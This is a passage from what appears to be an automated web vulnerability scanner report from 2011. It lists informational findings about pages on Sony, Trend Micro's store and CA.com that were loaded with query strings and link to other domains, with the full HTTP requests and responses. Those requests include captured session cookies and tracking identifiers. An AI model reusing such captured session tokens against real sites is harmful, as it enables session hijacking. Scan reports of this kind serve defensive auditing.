User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; TS5bbf46=959617bd472776e6829f43567043c6625f8782db79e380b64e666affd5df5daf336f8e10

Response

HTTP/1.1 200 OK
Cteonnt-Length: 75919
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 75919
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:48:32 GMT
Connection: close
Cache-Control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/SonyStore" target="_blank">Twitter</a></li>
<li class="socialItem"><a class="socialLogo bloggerLogo seoImage" href="http://blog.discover.sonystyle.com/" target="_blank">Blog</a></li>
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li id="sgnlSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: SGNL By Sony" href="http://discover.sonystyle.com/sgnl/#">
<h3>
...[SNIP]...
<li id="sonyCameraClubSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank">
<h3>
...[SNIP]...
<li id="twitterSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Twitter" href="http://twitter.com/SonyStore" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Facebook" href="http://www.facebook.com/sonyelectronics" target="_blank"><span class="facebookLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Twitter" href="http://www.twitter.com/SonyStore" target="_blank"><span class="twitterLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Sony Blog" href="http://blog.discover.sonystyle.com/" target="_blank"><span class="bloggerLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: YouTube" href="http://www.youtube.com/user/sonyelectronics" target="_blank"><span class="youtubeLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank"><span class="flickrLogo socialLogo">
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/SonyStore" target="_blank">Twitter</a></li>
<li class="socialItem"><a class="socialLogo bloggerLogo seoImage" href="http://blog.discover.sonystyle.com/" target="_blank">Blog</a></li>
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://www.sonycreativesoftware.com/" target="_blank" id="sonyCreativeGlobalFooterLink" rel="" class="directoryListingLink">Sony Creative Software</a>
...[SNIP]...
<noscript><img src="https://sonysscom.112.2O7.net/b/ss/sonysscom/1/H.8--NS/0"
height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

12.6. https://store.trendmicro.com/DRHM/store

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.trendmicro.com
Path:   /DRHM/store

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /DRHM/store?Action=DisplayCheckoutPaymentPage&SiteID=tmamer&Locale=en_US HTTP/1.1
Host: store.trendmicro.com
Connection: keep-alive
Referer: https://store.trendmicro.com/store?Action=DisplayPage&Locale=en_US&SiteID=tmamer&id=ShoppingCartPage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ORA_WX_SESSION="10.2.2.129:260-0#0"; JSESSIONID=74CA66C6686E81F96F871B79152A151D; VISITOR_ID=971D4E8DFAED43672BD9EDEF2E7090049E8F29A9B6FF10E6; BIGipServerp-drh-dc2pod9-pool1-active=2164392458.260.0000; __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; __qca=P0-1869591235-1315350993064; bn_u=6923713914570485926; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%22%2C%22r%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Ftrend-micro-researchers-identify-vulnerability-in-hotmail%2F%22%2C%22t%22%3A1315351267113%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fcategory%2Fpharming%2F%22%2C%22l%22%3A%22Pharming%22%2C%22de%22%3A%7B%22su%22%3A%22Malware%20blog%20by%20TrendLabs%20provides%20internet%20security%20research%20information%20on%20worms%20viruses%20trojans%20adware%20and%20other%20internet%20threats%20and%20discusses%20how%20to%20protect%20your%20computer%20data%20from%20being%20hijacked%22%2C%22ti%22%3A%22Malware%20Blog%20%7C%20TrendLabs%20-%20by%20Trend%20Micro%22%2C%22nw%22%3A1544%2C%22nl%22%3A162%7D%7D

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=24051346139,0)
Date: Tue, 06 Sep 2011 18:21:15 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app96
Content-Length: 56184


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<meta name="author" content="Trend Micro Global Web Development MUC ;-)">

<link rel="icon" href="//a248.e.akamai.net/f/248/5462/2h/www.digitalriver.com/v2.0-img/images/trend/favicon.ico" type="image/x-icon" />
<link rel="shortcut icon" href="//a248.e.akamai.net/f/248/5462/2h/www.digitalriver.com/v2.0-img/images/trend/favicon.ico" type="image/x-icon" />


   <meta name="" content="">
...[SNIP]...
<!--!/esi:include -->
<link rel="stylesheet" href="https://drh.img.digitalriver.com/store?Action=DisplayContentManagerStyleSheet&SiteID=tmamer&StyleID=1780400&StyleVersion=42&styleIncludeFile=style.css" type="text/css" media="all" />
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=2ad48102&Env=BASE&Locale=en_US&SiteID=tmamer&StyleID=1780400&StyleVersion=42&ceid=177147900&cename=TopHeader&id=CheckoutPaymentAno
...[SNIP]...
<!-- begin site specific javascript -->


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/eddy/cm/multimedia/commonFunctions.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/OT_files/tmamer_globalTrial.js"></script>


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/OT_files/tmamer_CheckoutPaymentAnonymousPage_contentBody.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/jqCookie.js"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/browser_os_detect.js"></script>
...[SNIP]...
</style>

<script src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/js/jquery.maskedinput-1.1.4.pack.js" type="text/javascript"></script>
...[SNIP]...
<a href="http://store.trendmicro.com/store"><img src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/images/images/logotrendmicro_3d_tagline_b.gif" alt="Trend Micro: Securing your Journey to the Cloud" height="50" width="305"></a>
...[SNIP]...
<div id="dr_verisign" title="This site chose VeriSign SSL for secure e-commerce and confidential communications.">
           <script src=https://seal.verisign.com/getseal?host_name=store.trendmicro.com&size=M&use_flash=YES&use_transparent=YES&lang=en></script>
...[SNIP]...
<!--Checkout-->
<img src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/images/Aug09/cartheadblack_b.gif" height="27" alt="shopping cart" />
<div class="bcBlack">
...[SNIP]...
<div id="dr_ExpandPaymentDetailsPayPalExpress">
<img src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/cc_paypal_logo.gif" border="0" align="left" valign="middle" id="dr_paypalExpressImage"> Make a payment from your new or existing PayPal account. Be sure to use your PayPal login as your order email address.
</div>
...[SNIP]...
<p><img src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/cc_mc_en_US.gif" alt="We Accept all Major Credit Cards" border="0"/></p>
...[SNIP]...
<div id="postProc" style="visibility:hidden;margin-top:-30px;">
                       <img src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/pageLoading_en_US.gif" border="0" />
                   </div>
...[SNIP]...
<a href="#" title="Close Window"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/close_en_US.gif" align="right" alt="Close Window" border="0"/></a>
...[SNIP]...
<a href="/store/defaults/en_US/DisplayDRAboutDigitalRiverPage" target="DrOverlayIframe"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/Library/images/dr_logo_0209.gif" width="115" height="27" alt="Digital River" border="0"></a>
...[SNIP]...
<a href="#"><img border="0" src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/icon_printer.gif" alt="Print"/></a>
...[SNIP]...
</script>


<script language="javascript1.2" src="//libs.coremetrics.com/eluminate.js" type="text/javascript">
</script>
...[SNIP]...
<!-- ####################################### -->


<script src="https://display.digitalriver.com/?aid=244&tax=trend_micro" type="text/javascript" defer="defer"></script>
...[SNIP]...

12.7. https://store.trendmicro.com/store

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.trendmicro.com
Path:   /store

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /store?Action=DisplayPage&Locale=en_US&SiteID=tmamer&id=ShoppingCartPage HTTP/1.1
Host: store.trendmicro.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ORA_WX_SESSION="10.2.2.129:260-0#0"; JSESSIONID=74CA66C6686E81F96F871B79152A151D; VISITOR_ID=971D4E8DFAED43672BD9EDEF2E7090049E8F29A9B6FF10E6; BIGipServerp-drh-dc2pod9-pool1-active=2164392458.260.0000; __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.2.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bn_u=6923713914570485926; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fhome%2Fhome-user%2F%22%2C%22r%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fhome%2F%22%2C%22t%22%3A1315350861448%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fwww.trendsecure.com%2Fcommonapi%2Fredirect.php%3Fl%3Den-US%26a%3DMT-EN%22%2C%22l%22%3A%22My%20Account%20Log-In%5Cn%22%2C%22de%22%3A%7B%22su%22%3A%22Free%20online%20virus%20scan%20and%20antivirus%20trial%20downloads.%20Get%20it%20only%20from%20TrendMicro.com!%22%2C%22ti%22%3A%22Home%20%26%20Home%20Office%20%7C%20Internet%20Security%20Software%22%2C%22nw%22%3A253%2C%22nl%22%3A225%7D%7D; fsr.s={"v":1,"rid":"1315350793273_559343","pv":2,"to":3.5,"c":"http://us.trendmicro.com/us/home/home-user/","lc":{"d1":{"v":2,"s":true}},"cd":1,"sd":1,"f":1315350865822}

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=101360405795,0)
Date: Tue, 06 Sep 2011 18:15:31 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app96
Content-Length: 95454


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<meta name="author" content="Trend Micro Global Web Development MUC ;-)">

<link rel="icon" href="//a248.e.akamai.net/f/248/5462/2h/www.digitalriver.com/v2.0-img/images/trend/favicon.ico" type="image/x-icon" />
<link rel="shortcut icon" href="//a248.e.akamai.net/f/248/5462/2h/www.digitalriver.com/v2.0-img/images/trend/favicon.ico" type="image/x-icon" />

<meta name="X-Imperia-Live-Info" content="434533e2-78c9-5cfe-f9ed-c2bcbc0c2e76/1/6/4147">
...[SNIP]...
<!--!/esi:include -->
<link rel="stylesheet" href="https://drh.img.digitalriver.com/store?Action=DisplayContentManagerStyleSheet&SiteID=tmamer&StyleID=1876500&StyleVersion=55&styleIncludeFile=style.css" type="text/css" media="all" />
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=2ad48102&Env=BASE&Locale=en_US&SiteID=tmamer&StyleID=1876500&StyleVersion=55&ceid=177147900&cename=TopHeader&id=ShoppingCartPage"-
...[SNIP]...
<!-- begin site specific javascript -->


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/eddy/cm/multimedia/commonFunctions.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/OT_files/tmamer_globalTrial.js"></script>


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/OT_files/tmamer_ShoppingCartPage_contentBody.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/jqCookie.js"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/browser_os_detect.js"></script>
...[SNIP]...
<!-- Begin Hiconversion Head Enabling. Do NOT move. Must come directly before the closing head tag -->
               <script id='hiconversion_head_include' type='text/javascript' src='https://www.hiconversion.com/enabling/update.jsp?external=&version=1.0'></script>
...[SNIP]...
<a href="http://store.trendmicro.com/store"><img src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/images/images/logotrendmicro_3d_tagline_b.gif" alt="Trend Micro: Securing your Journey to the Cloud" height="50" width="305"></a>
       </div>
<div id="dr_verisign">
   <script src="https://seal.verisign.com/getseal?host_name=store.trendmicro.com&size=M&use_flash=YES&use_transparent=YES&lang=en"></script>
...[SNIP]...
<!--Checkout-->
<img src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/images/Aug09/carthead_b.gif" height="27" alt="shopping cart" />
<div class="bcGrey">
...[SNIP]...
<div id="dr_moneyBackGuarantee"><img src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/images/30DayMBSG-CMYK-Burst_sm2.gif" /></div>
...[SNIP]...
<div id="dr_cartProdImage" style="float:left;">
<img alt="Titanium AntiVirus+ - 1 year" src="//drh1.img.digitalriver.com/DRHM/Storefront/Company/tmamer/images/product/thumbnail/TiAV542.gif" border="0"/> </div>
...[SNIP]...
<div id="dr_cartProdImage" style="float:left;">
<img alt="Smart Surfing for Mac - 1 year Complimentary Copy" src="//drh1.img.digitalriver.com/DRHM/Storefront/Company/tmamer/images/product/thumbnail/SSM542.jpg" border="0"/> </div>
...[SNIP]...
<a href="/DRHM/store?Action=DisplayBackUpCDInformationPage&SiteID=tmamer&Locale=en_US&Env=BASE" onclick="popUp(this.href,'BackupCD',410,360);return false;" target="_blank"><img src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/pb/images/siteOpt/cdimg.png" border="0" class="backupcdimage" />
<span class="dr_blueOfferHeader">
...[SNIP]...
<a href="/DRHM/store?Action=AddItemToRequisition&SiteID=tmamer&Locale=en_US&Env=BASE&productID=8350200&productDataID=1934000000" onClick="q=false"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/buttons/add2.jpg" border="0" name="Add_8350200" /></a>
...[SNIP]...
<td class="paymentimages"><img src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/images/images/cartPaymentOptions3.gif" alt="Visa, Master Card, Discover, American Express, Diner's Club International, JCB, PayPal, Wire Transfer" /></td>
...[SNIP]...
<div class="dr_cart_details_overlay_arrow"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/cdo_arrow.gif"/></div>
...[SNIP]...
<a href="javascript:void(closeProductDetailsOverlay())" title="Close Window" onmouseover="self.status='Close Window';return true;" onmouseout="self.status='';return true;"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/close_en_US.gif" alt="Close Window" align="right" border="0" /></a>
...[SNIP]...
<div>

<img class="dr_cart_details_overlay_boxshot" align="left" alt="Titanium AntiVirus+ - 1 year" src="//drh1.img.digitalriver.com/DRHM/Storefront/Company/tmamer/images/product/thumbnail/TiAV542.gif" border="0"/>

<div class="dr_cart_details_overlay_description">
...[SNIP]...
<div class="dr_cart_details_overlay_arrow"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/cdo_arrow.gif"/></div>
...[SNIP]...
<a href="javascript:void(closeProductDetailsOverlay())" title="Close Window" onmouseover="self.status='Close Window';return true;" onmouseout="self.status='';return true;"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/close_en_US.gif" alt="Close Window" align="right" border="0" /></a>
...[SNIP]...
<div>

<img class="dr_cart_details_overlay_boxshot" align="left" alt="Smart Surfing for Mac - 1 year Complimentary Copy" src="//drh1.img.digitalriver.com/DRHM/Storefront/Company/tmamer/images/product/thumbnail/SSM542.jpg" border="0"/>

<div class="dr_cart_details_overlay_description">
...[SNIP]...
<div class="dr_cart_details_overlay_arrow"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/cdo_arrow.gif"/></div>
...[SNIP]...
<a href="javascript:void(closeProductDetailsOverlay())" title="Close Window" onmouseover="self.status='Close Window';return true;" onmouseout="self.status='';return true;"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/close_en_US.gif" alt="Close Window" align="right" border="0" /></a>
...[SNIP]...
<div>

<img class="dr_cart_details_overlay_boxshot" align="left" alt="Extended Download Service" src="//drh2.img.digitalriver.com/DRHM/Storefront/Company/tmamer/images/product/thumbnail/pixel.gif" border="0"/>

<div class="dr_cart_details_overlay_description">
...[SNIP]...
<a href="javascript:checkSN();" onClick="q=false;"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/buttons/continuecheckout2.jpg" onClick="javascript:processPage();q=false;" alt="Continue" /></a>
...[SNIP]...
<div id="postProc" style="visibility:hidden;margin-top:-30px;">
<img src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/pageLoading_en_US.gif" border="0" />
</div>
...[SNIP]...
<a href="/DRHM/store?Action=ContinueShopping&SiteID=tmamer&Locale=en_US&Env=BASE" onClick="q=false"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/sc_continueshopping_en_US.gif" /></a>
...[SNIP]...
<a href="javascript:checkSN();" onClick="q=false"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/buttons/continuecheckout2.jpg" /></a>
...[SNIP]...
<a href="javascript:checkSN();" onClick="q=false;"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/buttons/continuecheckout2.jpg" /></a>
...[SNIP]...
<a href="#" title="Close Window"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/close_en_US.gif" align="right" alt="Close Window" border="0"/></a>
...[SNIP]...
<a href="/store/defaults/en_US/DisplayDRAboutDigitalRiverPage" target="DrOverlayIframe"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/Library/images/dr_logo_0209.gif" width="115" height="27" alt="Digital River" border="0"></a>
...[SNIP]...
<a href="#"><img border="0" src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/icon_printer.gif" alt="Print"/></a>
...[SNIP]...
</script>


<script language="javascript1.2" src="//libs.coremetrics.com/eluminate.js" type="text/javascript">
</script>
...[SNIP]...
<!-- ####################################### -->


<script src="https://display.digitalriver.com/?aid=244&tax=trend_micro" type="text/javascript" defer="defer"></script>
...[SNIP]...

12.8. https://www.ca.com/us/register/createprofile.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ca.com
Path:   /us/register/createprofile.aspx

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /us/register/createprofile.aspx?returnURL=/us/default.aspx HTTP/1.1
Host: www.ca.com
Connection: keep-alive
Referer: http://www.ca.com/us/default.aspx
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351461237:ss=1315351389192

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 18:25:47 GMT
Content-Length: 458334


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<scri
...[SNIP]...
<link href="/css/AutoComplete.css" rel="stylesheet" type="text/css" media="screen" />-->

<link href="https://f.fontdeck.com/s/css/zH28mslJNSfrEtk/N8vkA5GMvEQ/*.ca.com/6172.css" rel="stylesheet" type="text/css"/>
<link href="/css/base.css" rel="stylesheet" type="text/css" media="screen"/>
...[SNIP]...
<link href="/~/media/css/legacy-global.css" rel="stylesheet" type="text/css" media="screen" />-->


<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="https://secure.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...

12.9. https://www.ca.com/us/register/login.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ca.com
Path:   /us/register/login.aspx

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /us/register/login.aspx?TYPE=33554433&REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=rs-prod-communities-wa&TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141 HTTP/1.1
Host: www.ca.com
Connection: keep-alive
Referer: http://www.ca.com/us/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351414553:ss=1315351389192; 